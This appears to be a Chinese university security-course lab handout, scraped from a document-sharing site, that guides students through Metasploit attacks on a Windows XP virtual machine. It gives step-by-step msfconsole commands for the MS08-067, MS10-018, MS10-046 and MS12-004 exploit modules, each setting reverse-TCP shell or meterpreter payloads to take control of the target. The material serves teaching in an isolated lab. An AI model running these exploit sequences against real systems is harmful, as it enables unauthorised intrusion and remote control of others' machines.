计算机系统安全-实验二-metasploit

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

计算机系统安全实验二:操作系统安全与metasploit渗透测试实验目的:学习计算机操作系统安全相关内容。学习操作系统渗透相关内容学习metasploit渗透工具使用。实验原理:Windows操作系统安全结构网络渗透原理实验环境:软件:vmware8.0环境下,虚拟机,vm-WinXP镜像虚拟机,backtrack4及backtrack5虚拟机镜像等。实验拓扑:被渗透机:使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP地址为,自动获得,虚拟机网络连接方式NAT方式。实验室计算机network系统下中network_vm目录中有metasploitable_XP,可使用之。渗透测试机:使用Bt4或5作为操作系统,准备工作:启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:被渗透机:操作系统:____windowsxpwithsp1_________IP地址:_______192.168.160.136_____________渗透测试机:操作系统:___________bt5_______IP地址:___________192.168.160.134________(注意,若网络连接未启用,请先启用之,linux下可使用ifupeth0)实验内容:第一部分:针对操作系统内部服务端口进行渗透了解ms08-067漏洞详情:(请课后上网查询相关内容)漏洞描述:曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。漏洞对象:受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有WindowsXP/2000/Vista/2003等。除WindowsServer2008Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows2000、WindowsXP和WindowsServer2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。漏洞端口:_______445_________________________________________________步骤一:启动metasploit控制台msfconsole记录其步骤二:搜索模块ms08-067号模块searchms08-067找到模块,记录其名称,级别,描述步骤三:使用这个模块usewindows/smb/ms08_067_netapi步骤四:查找有用的payloadsshowpayloads步骤五:使用其中最常用的一个payloadsetpayloadwindows/shell/reverse_tcp步骤六:查看当前的这个payload以及攻击所需要的参数选项showoptions发现模块所需要选项,有些有默认参数:RPORT,SMBPIPE有些没有RHOST发现payload所需要参数,有些有默认参数:EXITFUNC,LPORT有些没有:LHOST渗透的目标设置值:0步骤七:设置参数setRHOSTxx.xx.xx.xx被渗透主机的IP地址setLHOSTxx.xx.xx.xx渗透测试主机的IP地址。步骤八:showoptions查看当前参数设置是否齐全。步骤九:showtargets查看当前攻击的目标。0若有,则表示可进行自动选择攻击。其他,则为特定选择特定系统。步骤十:参数齐全,目标选定,渗透载荷准备就绪,然后实施。exploit渗透开始。。。。。自动创建一shell(命令提示符)使用ipconfig及dir等命令确定当前控制的计算机是哪台。打开放大镜:步骤十一:Exit然后再exit退出。第二部分:针对操作系统下的浏览器进行渗透步骤一:浏览器漏洞MS10-018了解ms10-018漏洞详情:(请课后上网查询相关内容)漏洞描述:在提交数据时InternetExplorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。成功利用这个漏洞的攻击者可以查看本地计算机或其他域或InternetExplorer区中的其他浏览器窗口的内容。漏洞对象:Microsoft__Internet__Explorer__7.0Microsoft__Internet__Explorer__6.0__SP1Microsoft___Internet__Explorer__6.0Microsoft__Internet__Explorer__5.0.1__SP4漏洞端口:8080步骤一:启动metasploit控制台msfconsole步骤二:搜索模块ms10-018号模块searchms10-018找到模块,记录其名称,级别,描述步骤三:使用这个模块usewindows/browser/ms10_018_ie_behaviors步骤四:查找有用的payloadsshowpayloads步骤五:使用其中最常用的一个payloadsetpayloadwindows/shell/reverse_tcp步骤六:查看当前的这个payload以及攻击所需要的参数选项showoptions发现模块所需要选项,有些有默认参数:SRVHOST,SRVPORT,SSL,SSLVersion有些没有:URIPATH发现payload所需要参数,有些有默认参数:EXITFUNC,LPORT有些没有:LHOST步骤七:设置SRVHOST和LHOST都设置为渗透测试机IPsetSRVHOSTxx.xxx.xx.xxxsetLHOSTxx.xx.xxx.xxxtarget可设置为0渗透准备exploit则列出一URL如:usingurl:htpp://xxx.xxx.xxx.xxx:8080/qte30235fs暂时渗透到此(注意其中的qte30235fs为自动产生)在当对方机器使用htpp://xxx.xxx.xxx.xxx:8080/qte30235fs时,sessions产生使用sessions来获知sessionsessions-i1直接将session转到shell中创建一shell(命令提示符)使用ipconfig及dir等命令确定当前控制的计算机是哪台打开写字板:第三部分:针对操作系统下类似快捷方式使用进行渗透步骤一:浏览器漏洞MS10-046了解ms10-046漏洞详情:(请课后上网查询相关内容)漏洞描述:Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。漏洞对象:MicrosoftWindowsXPSP3MicrosoftWindowsXPSP2MicrosoftWindowsVistaSP2MicrosoftWindowsVistaSP1MicrosoftWindowsServer2008MicrosoftWindowsServer2008SP2MicrosoftWindowsServer2008R2MicrosoftWindowsServer2003SP2MicrosoftWindows7漏洞端口:_________80_______________________________________________步骤一:启动metasploit控制台msfconsole步骤二:搜索模块ms10-046号模块searchms10-046找到模块,记录其名称,级别,描述步骤三:使用这个模块usewindows/browser/ms10_046_shortcut_icon_dllloader步骤四:查找有用的payloadsshowpayloads步骤五:使用其中最常用的一个payloadsetpayloadwindows/shell/reverse_tcp步骤六:查看当前的这个payload以及攻击所需要的参数选项showoptions发现模块所需要选项,有些有默认参数:SRVPORT,SRVHOST,URIPATH有些没有UNCHOST发现payload所需要参数,有些有默认参数:EXITFUNC,LPORT有些没有:LHOST步骤七:设置SRVHOST和LHOST都设置为渗透测试机IPsetSRVHOSTxx.xxx.xx.xxxsetLHOSTxx.xx.xxx.xxx设置浏览的URLsetURIPATHhzs.html(其中hzs为你的姓名的首字母)target可设置为0渗透准备exploit报错,说明URIPATH不能改动,需要改回默认值重新exploit则列出一URL如:usingurl:htpp://xxx.xxx.xxx.xxx:8080/hzs.html暂时渗透到此在当对方机器使用如:usingurl:htpp://xxx.xxx.xxx.xxx:8080/hzs.html时,sessions产生使用sessions来获知sessionsessions-i1直接将session转到shell中创建一shell(命令提示符)使用ipconfig及dir等命令确定当前控制的计算机是哪台打开任务管理器:使用taskmgr命令*第四部分:渗透时使用meterpreter工具。浏览器漏洞MS12-004WindowsMediaPlayer是系统的多媒体播放组件。WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。受影响系统:MicrosoftWindowsXPProfessionalMicrosoftWindowsXPHomeEditionMicrosoftWindowsVistaMicrosoftWindowsStorageServer2003MicrosoftWindowsServer2008MicrosoftWindowsServer2003WebEditionMicrosoftWindowsServer2003StandardEditionMicrosoftWindowsServer2003EnterpriseEditionMicrosoftWindowsServer2003DatacenterEditionMicrosoftWindows7启动msfconsolesearchms12_004搜索不到该模块得到相关结果为windows/browser/ms12_004_midi使用它usewindows/browser/ms12_004_midi查看payloadsshowpayloadssetpayloadwindows/meterpreter/reverse_tcp查看相关的选项optionsshowoptions有SRVHOSTSRVPORTSSL及SSLversion为模块的参数有EXITFUNC和LHOST及LPORT作为payload的参数。还有target设置

1 / 21
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功